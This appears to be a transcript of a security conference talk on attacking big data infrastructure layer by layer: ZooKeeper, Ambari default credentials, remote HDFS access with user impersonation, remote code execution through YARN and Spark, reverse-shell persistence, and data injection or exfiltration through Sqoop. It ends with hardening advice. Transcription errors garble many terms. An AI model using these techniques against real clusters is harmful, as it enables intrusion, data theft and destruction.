 Hi everyone, welcome to my talk on big data insecurity. I will talk about how we can analyze these big data infrastructures from an offensive point of view. Before starting, let me introduce myself briefly. My name is Sheila. I work at Heidel Research at Dream Lab Technologies, a Swiss infosec company, and an offensive security specialist with several years of experience. And in the last time I have focused on security in cloud environments, cloud-nated, big data and related stuff. Ok, so let's go to the important things. There are some key concepts I would like to explain before jumping into the security part. Probably the first thing that comes to mind while talking about big data is the challenge of studying large volumes of information and the technology that will take care of it. Although that's correct, around the storage technology there are many others of great importance that make up the ecosystem. When we design big data architectures, we might think about how the data will be transported from the source to the storage, if the data requires some kind of processing to be consumed, and how the information will be accessed. So the different processes that the data goes through are divided into four main layers that comprise the big data stack. We have the data ingestion, that is, the transport of the information from the different origins to the storage place, the storage itself, the data processing layer, because the most common is to ingest raw information that later needs some kind of processing. And finally the data access layer, basically how users will access and consume the information. And let's add one more layer here that is not part of the big data stack, but we have this layer in all big data infrastructures. The cluster management is really important. So for each of these layers there is a wide variety of technologies that can be implemented because the big data stack is hugely big. This one arches a few of the most popular ones, for example Hadoop for the storage, Spark and Storm for processing, Impala, Presto, Dread for accessing the information, Flune, Scope for the ingestion, TwoKieper for management, for example. So when we analyze an entire big data infrastructure, we can actually find many different and complex technologies interacted with each other, that they meet different functions according to the layer of the stack where they are located. So let's see an example of our real big data architecture. Here we have two different clouds, one in LVVS and another one in any other cloud provider. Both are running some Kubernetes clusters that are serving different applications. And we want to store and analyze the logs of these applications. So we will use Flymbit to collect all the application logs, and write them to Kafka for the first cloud, and stream them using Flune and Kinesis to an on-prem Hadoop cluster. So within the Hadoop cluster, the first component that will receive the data is a Spark instructor streaming. This one will take care of ingesting and also processing the information before dumping it into the Hadoop file system. So once we have our information here, we want to access it. So for that, we could implement, for example, Hive and Presto. Or instead of Presto, we could use Impala, Dread, or any other technology for interactive queries against Hadoop. And if we are developing our own software to visualize the information, we will probably have an API tacking to the Presto coordinator and a nice frontier. And finally, we have the management layer. Here it's super common to find Apaches to Keeper to centralize the configuration of all these components, and also an administration tool like Gambari, or a centralized log system for cluster monitoring. So this is an example of our real Big Data architecture and how the components interact with each other. So back to security, the question is how we can analyze these complex infrastructures? I would like to propose a methodology for this, where the analysis is based on the different layers of the Big Data stack. Because I think that a good way to analyze Big Data infrastructures is to dissect them and analyze the security of the components layer by layer. In this way, we can make sure that we are covering all the stages that the information we want to protect go through. So from now on, I will explain different ATT&CK vectors that I found throughout this research for each of the layers. So let's start with the management layer. So Keeper, as I said, is a widely used tool to centralize the configuration of the different technologies that make up the cluster. And its architecture is pretty simple. It runs its service on all nodes, and then a client, let's say a cluster administrator, can connect to one of the nodes and update the configuration. So when that happens, Keeper will automatically broadcast the change across all the nodes. So if we scan a node of the cluster, we will find the ports 21, 81, and 38, 88 open, because these ports belong to Keeper, are opened by Keeper, basically. So the ports 21, 81 is the port that accepts connection from client. Should we be able to connect to it? Well, according to the official documentation of fan body, a tool that is widely used for deploying on-prem big data casters, disabled the firewall is a requirement for installing big data casters. So we can probably connect to Keeper. How should we do it? We can download the Keeper client from the official website. Then it's just about running this command, specifying the node IP address and the 21, 81 port. So once we connect, if we are on the help command, there is a list of actions that we can execute over the C nodes. The C nodes or to Keeper nodes are the configurations that should keeper organizes in a hierarchical extractor. So with the LS and GET commands, we can browse this hierarchical extractor. We can find very interesting information about the configuration of all the components that make up the cluster, like Hadoop, Hive, HBase, Kafka, whatever, and of course we could use it for firewall attacks. We can also create new configurations, modify existing ones, delete configurations, and this actually will be a problem for the cluster. Some components might go down because to Keeper, for example, is commonly used to manage the Hadoop Hive availability. So if we delete everything, the cluster might run into troubles. So I won't show a demo of this because it's a pretty simple attack, but it's actually quite impactful. So what about on-body? This is a pretty popular open source tool to install and manage big data clusters. And it has a dashboard from which you can control everything, whose default credentials are admin-admin, of course. But if they were changed, there is a second drawer absolutely worthy to check. Umbary uses a Postgres database to store the statistics and information about the cluster. In the default installation process, the Umbary Wizard asks you to change the credentials for this dashboard, but it doesn't ask you to change the default credentials for the database. So we could simply connect to the Postgres port directly using these default credentials. There are user Umbary and password BigData, and explore this Umbary database. We will find here two tables, the user authentication and users one. So if we want to get the username and authentication key at once, we need to do this inner shrankery between those two tables. The authentication key is a salted hash. So the best thing that we can do here is to update the key for the admin user, for example. I'm logging to the body source code to find a body salted hash. Here we have the hash for the admin password. So now we can run an update query, and once done we can log into the Umbary dashboard with the admin credentials. Well I know that this is actually pretty stupid, but it's absolutely worth checking because a body controls the whole cluster. If you can access this dashboard, you can do whatever you want over the cluster. And as the default installation process doesn't ask for these credentials to be changed, then you can most likely compromise them in this way. Cool, so the important thing in the cluster management layer is to analyze the security of the administration and monitoring tools. So let's now talk about this storage layer. First of all it's good to understand how Hadoop works. It has a master slave architecture and two main components, the hdf, that means Hadoop distributed file system, and yarn. So the hdf has two main components, the name node that saves the metadata of the files stored in the cluster, and runs in the master node, and the data node that stores the actual data, and runs in the slave nodes. And on the other hand, yarn consists of two components as well, the resource manager located on the master nodes, it controls all the processing resources in the Hadoop cluster, and the node manager, installing the slave nodes that take care of tracking processing resources on its slave node, among other tasks. But basically what we have to know is that the hdf, that is the Hadoop file system, is where the cluster information is stored, and then yarn is a service that manages the resources for the processing shafts that are executed over the information store. Basically it is stored. So when it comes to the storage layer, we are interested in the Hadoop file system. So let's hear how we could remotely compromise it. Hadoop exposes an IPC port on 8020 that we should find opened in Hadoop clusters. So if we can connect to it, we could execute Hadoop's commands and access the stored data. However, this is not as simple as the secure example was, so managing to do this is a little more complex. There are four configuration files that Hadoop needs to perform operations over the Hadoop file system, and if we take a look at these files inside a name node, we can see that they have dozen of configuration parameters. So when I saw that, I wonder, if I am an attacker, and I don't have access to these files, how can I compromise the file system in a remote way? So what part of this research was to find among those dozen of parameters, which ones are 100% requires, and how we can get them remotely from the information that Hadoop itself discloses by default. So I will explain now how we can manually craft these files one by one. This is start by the core site xml file. The only information we need to help with this file is the namespace. This is pretty easy to find, Hadoop disposes by default a dashboard on the name nodes, on the port 50,070, it's a pretty high port, and we can access it without indication. So as you can see here, we can find the namespace name, and that's all we need for this file. Then we need to craft the hdf site file, it's necessary to know the namespace that we already have from the previous file, and we also need the name nodes id's and the dns of them. So we could have one, two, or more name nodes, and we need to provide the id and the dns for all of them in this file. Where can we have this information? From the same dashboard. We have the namespace here, the name node id, and the dns. So we should need to access this dashboard on each name node. Remember that this is on port 50,070. Another alternative is to enter the data node dashboard on port 50,075. Then we can see all the namesnodes at once. So the next file is the mapper site one. Here we need the dns of the name node that hosts the MapReduceShopHistory. We can try to access the port 19,888 on the name node. If we can see this dashboard, then that's the name node that we are looking for. We already know it's dns from the previous dashboard. So finally, we need to craft the yaml site file. Again, we need the name node dns, in this case the one that hosts the yaml resource manager. So we can try to access the port 80,88, and if we see this dashboard, then that's the right node. We can get it dns, of course. So all these dashboard are exposed by default and don't require any authentication. But for some reason, we cannot see them. We can try to get this required information through sukeeper, with the attack I showed you earlier, because sukeeper also has all this information. Cool, so once we have the configuration files we need, the next step is to install Hadoop in our local machine and provide it with those files to perform the remote communication. As I didn't want to install Hadoop on my local machine and I built this Docker file, feel free to use it, it's pretty comfortable. You should need to change the Hadoop version to match the version of your target cluster. So from now on, this is going to be our Hadoop hacking container, running on the attacker machine. Cool, so let's run and get a shell inside it. We can create a config directory to place the XML files we have crafted before. And you also need to copy this slug.property file inside this folder. And another thing I did is was to delete the host file to write the result of these node dns. You can actually use the IP addresses on the XML files. But for some reason I had better results in doing this. Ok, so we are ready to go. Choose path to Hadoop this config directory and you can execute for example an ls command. So voilà, we can see the entire Hadoop file system from a remote attacker machine. But before shamping into a demo of this, I would like to mention that most likely we will need to impersonate ATDF users. For example if I try to create a new directory using the root user, I cannot. So we need to impersonate a user that has privileges within the Hadoop file system. That means one of these ones. Fortunately that's very easy to do. We just need to set this environment with the Hadoop username before the command. And that's all. That will allow us to create directories and also will allow us to delete directories and files. So we could wipe out the entire cluster information. Ok, so let's see a demo of this. Here I had my files, the core site with the namespace. I also have the hdfs file. This has more information, the namespace and also the namesnodes. For the namesnodes I need to specify the DNS. I have two name nodes in this case. So I need to specify the DNS for both of them. And then this last property was something that I had to add for this specific cluster. The map website has the DNS for the MapReduceShopGistory address. The name node that has this resource. For the yaml site I had to specify the DNS as well for the resource manager node. So once we have those files we are just ready to go and we can execute Hadoop's commands over the remote file system. If we check the help for Hadoop, for the fs commands we can find a super common command for any unix system to remove, copy, delete, move files and whatever. To impersonate we need to specify this environment variable as we saw before. And here we can create directories or we can modify files or delete also any directory, right? Good. So let's now talk about the processing layer and how we can abuse yaml in this case. So back to the Hadoop architecture just to remember. YAML test case was processing shops over the data. So this shop executes code in the data node. So our mission here is to try to find a way to remotely submitting an application to yaml that executes a code or recommend that we want to execute in the clusters node. Basically achieve our remote code execution through yaml. We can use the Hadoop IPC that we were using in the previous attack. It's just necessary to improve a little bit our yaml site file. We need to add the yaml application class path property. This path used to be the default path in Hadoop installations. So it should not be difficult to update this information. In the example here we can see the default path for installation using the Hortonworks packages. Then this other property is optional. It will specify the application output path in the Hadoop file system. It might be useful for us to easily find the output of our remote code execution, but it's not necessary. And something I would like to mention that I didn't say for. If you can access these panels that we have seen under the slash conf, we can find all the configuration parameters. But you cannot just download and use that file. We still need to manually graph the files the way we were doing it. However, if something is not working for you, here you might find what's missing. For example, here we have the path that we are looking for for the property we have to set in this case. Good. So now that we have improved our yaml file and we have suddenly the application to yaml, the question is what application should we submit? Here Hortonworks provides a simple one that is enough for us to achieve the remote code execution that we want. It has only three Hava files, because yaml applications are developed in Java, but there are a lot of Hadoop libraries necessary to include and use, so it might not be so easy to develop a native yaml application. But we can use this one for our proposed. It takes as parameter the command to be executed on the cluster of nodes and the number of instances, which is basically on how many nodes our command will be executed, right? So we will clone this repository in our Hadoop hacking container and proceed to compile this yaml application. We need to edit the pion.xml file and change the Hadoop version to match the version of our target. This is really important, otherwise this is not going to work. So once we do that, we can compile the application using maven. Good. So the next step is to copy the compiled yaml into the remote Hadoop file system. We can do it using the copy from local hdf command. And after that we are ready to go. In this way we can submit the application to yaml, passing as parameter the command that we want to execute and the number of instances. Here, for example, I have executed the hosting command over three nodes. And we are going to receive an application ID. It's important to take enough of it. But it's even more important to get these finished status because that means that our application was executed successfully. And now what? Where can we see the application output? This is what we are interested in, right? Well, we can use this command passing the application ID we got in the previous step. And the output is going to be something like this. We have executed this command over three nodes. So we have three different outputs for the hosting command. Of course, we can change the hosting command for any other, right? So let's see a demo of this. Here I have improved the yaml file to add the path I need to add. And I have my simple yaml application from Hortonworks. And I already uploaded it to the Hadoop file system. So remember you can simply copy from local and just upload the chart to the remote Hadoop target. And now with this command we have to specify the local path of the yaml file and the command that we want to execute and the number of instances, the nodes, and the remote path. So with this command we are going to get our application ID and the status. So now we need to use this application ID. In my case I need to move the output from one directory to another one just to allow yaml to find the output in the next command. It might be not necessary for you. So with the yaml command we can just get the output of this application. So we are going to see the output for the three nodes. We have the hosting output for the Hadoop 1, the first node, Hadoop 2, and Hadoop 3. Good. So let me show you one more. I submit one more application before to dump a file of the nodes in this case the slashetc slash password file. So here we can see the password file for the three nodes as well. So basically you can change these and execute whatever command you want. So that's pretty easy to use. It also should be quite simple to change this yaml application to execute perhaps a more complex command. Just keep in mind that any changes must be made both in the application master file as we can see here in the slide and also in the client file. So for example, if we want to get something like a reverse shell on the cluster nodes, it's possible. But keep in mind that this is a shop that starts and finishes. So we might need to use alternatives like backdooring the ground up with the yaml application, for example. So you can execute this command with the yaml application and then back to the ground up and then you will have your reverse shell on every cluster. Sorry, on every node of the cluster. Good. I can help you talk about Spark in this section. Spark is super popular while implementing technology for processing data as well. It's generally installed on top of Hadoop and developers make data processing applications for Spark. For example, in Python using PySpark, because it's easier than developing a native application for yaml. And also Spark has other advantages over yaml. So as we can see here, Spark has its own IPC port on 7077. We can submit a Spark application to be executed on the cluster through this port. It's easier than with yaml. Here we have an example. This small code will connect to the Spark master to execute the hostname command on every cluster node. We should simply need to specify the remote Spark master IP address, our own IP address to receive the output of the command and the command itself. And then we should run this script from our machine. We don't need anything else. It's quite simple. But I'm not going to talk in depth about this, because there is already a talk 100% dedicated to Spark. That's what's given at Defcon that here. So I truly recommend watching this talk. The speaker explains how to achieve remote code execution via Spark IPC. That is the equivalent of what we did with yaml. So keep in mind that Spark may or may not be present in the cluster, while yaml will always be present in Hadoop installations. So it's good to know how to achieve remote code execution via yaml and also via Spark. We have the possibility to abuse this technology as well. Awesome. So let's take a look at the in-question layer node. If you remember from our big data architecture example at the beginning of this talk, we have sources of data, and such data is ingested to our cluster using data in-question technologies. There are several ones. We have sound design for streaming like flume, Kafka, a Spark structure streaming that is a variant of Spark. And then others like scope that inherits static information, for example from one data lake to other data lake from one database to a data lake, and so on. So from a security point of view, we need to make sure that these channels that the information goes through from the source to the storage are secure, right? Otherwise, the attacker might interfere those channels and it has malicious data. Let's see how this could happen. This is how Spark streaming or Spark structure streaming works. It's a variant of Spark that ingests data and also process it before dumping everything into the Hadoop file system. So it's like two components in one. So as Spark structure streaming or streaming, Scam works with technologies like Kafka, Flume, and Kinesis to pull or receive the data, and also has the possibility to just ingest data from a TCP socket. And that could be pretty dangerous. Here we have an example of how the code looks like when the streaming input is used at TCP socket. It basically binds supports on the machine. So a build phase is super easy. We can use NetCAD or our favorite tool and just send data over the socket. And it works. What happened to the data that we injected will depend on the application that processes it. Most likely we will crash the application because we might be in hacked invite that the application doesn't know how to handle or our bytes might end up inside the Hadoop file system. That's also likely. So it's important to check that the interfaces that are waiting for data to be ingested cannot be reached by an attacker. Regarding Hadoop, as I said, it's move static data. It's commonly used to ingest information from different SQL databases into Hadoop. And analyzing a scope server, iPhone and API is posed by default on port 12,000. We can get the scope server version, for example, using this query. But there is not so much documentation about the API and honestly it's quite easier to abuse these using the scope client. So something important is to download the same client version of this server. For example, this server is 1.99.7. We should download that version of the client from this website. So what can we do? Well, we could, for example, ingest malicious data from a database that belongs to the attacker into the target Hadoop file system. That takes some steps. We have to connect to the remote scope server, create some links. This provides the scope with the information to connect to the malicious database and the target Hadoop file system. And then we have to create a scope shop, specifying that we want to ingest data from this database link to this other HDF link, and store it. So this is quite easier to understand with a demo, so let's see a video demo of this. So here I have my scope client and I connected to the remote scope server. These are the connectors we have available. We need to create a link for the MySQL database, the remote attacker database. So I will specify the MySQL driver and the remote address of the database, some credentials to access to it. And then most of the parameters are optional. So I will just create it. And also we need to create a link for the HDF target. So here we have to specify two parameters. The first one is the remote IP address of the Hadoop IPC. In this case it's in the port 9,000, but it's going to be most likely in 80, 20, as we saw before. And the const directory is a remote path, not a local one, it's a remote path. It's going to be the Hadoop installation path by default. So now I'm here and I'm specifying the path of a DEXO machine, but it's going to be most likely a slash EDC, a slash Hadoop, a slash const. So now we have the links. We have to create a shop. And in the shop we are going to specify that we want to enhance data from the attacker MySQL database to the target HDF. So we need to specify the name of the table we are going to insist. And then most of the parameters are optional, so I'll leave it blank. So once we create the shop, also here we have to specify the output directory. And that's also important, that's the remote directory in the Hadoop IPC system. So, right, now we have our shop in KXMalicious Data Shop. We just need to start it. And this is all we are going to see in the attacker machine. But to show you that we actually in KXMalicious Data, I will log into the remote machine that has the Hadoop IPC system. Just to show that the data was actually injected in the IPC system. Here we have the hacking Hadoop. And the hello blah blah, this is just data that was in my remote MySQL. And I injected it into the Hadoop IPC system via scope. So keep in mind that you can inherit malicious data, but you can also export the data. Because the scope allows you to import and export. So you can do this in a reverse way and just steal data from the Hadoop IPC system into your remote MySQL database, for example. Good, so finally let's talk a little bit about the data access layer. Back to our architecture example, we saw that it's possible to use different technologies for data access. In this example, we are using Preston together with Hype, but there are many others. And when it comes to Hype and HBase, these are HDF-based storage technologies. But they also provide interfaces to access the information. For example, Preston needs the Hype Metastore to query the information stored in the Hadoop IPC system. So, this technology is supposed to dashboard and interfaces that can be abused by an attacker if they are not rightly protected. For example, Hype is supposed to have a dashboard on port 1002 where we can get interesting information and also an idea of how the data is structured in the storage. The same for HBase. Regarding Preston, I found this curious login form where password is not allowed. It's quite curious because it's a login form but you cannot enter a password. I know that you can set up one by default, it seems to be this way. So you can write admin user there and enter. And there is a dashboard that shows some information about the interactive queries being executed against the cluster. Good. So, as I said, this technology is supposed to several interfaces. It's common to find at least a shared DVC one. For example, in Hype we can find it on port 10,000. And there are different clients that we can use to connect to it. Like Squirrel, for example. Or even Hadoop includes VLine. We can connect to the remote Hype solvers just specifying the remote address. If no dedication is required, of course, but there is usually nothing by default. And Hype has its own commands. We need to know them to browse the information. With show databases, we can see the databases in the cluster, sell it one, and show it sales. And then we have sentences to insert, update, delete, like any other SQL database. Good. So, I'm running out of time, so let's provide some recommendations as conclusion. Many attacks that we saw through all this talk were based on SPOS interfaces. And there are many dashboards that are SPOS by default as well. So, if they are not being used, we should either remove them or block the access to them using a firewall, for example. If some components need to talk to each other without a firewall in the middle, then we should secure the perimeter at least. The firewall has to be present. Despite the official documentation asked for the sale in it, I believe that we can investigate what ports need to be allowed in our infrastructure and design a good firewall policy rules. And remember also to change all the default credentials and implement any kind of authentication in all the technologies being used. Hadoop supports authentication for the HTF. It's actually possible to implement authentication and authorization in most of the technologies that we have seen. But we have to do it, because by default, there is nothing implemented. Finally, remember that in big data infrastructure, there are many different technologies communicating with each other. So, make sure that those communications are happening in a secure way. Good. So, in the next weeks, I hope to be able to publish more resources about the practical implementation of security measures. So, for today, that's all. Thank you for watching my talk. And here's my contact information in case you have any questions. Please feel free to reach me out. Thank you so much. Bye-bye.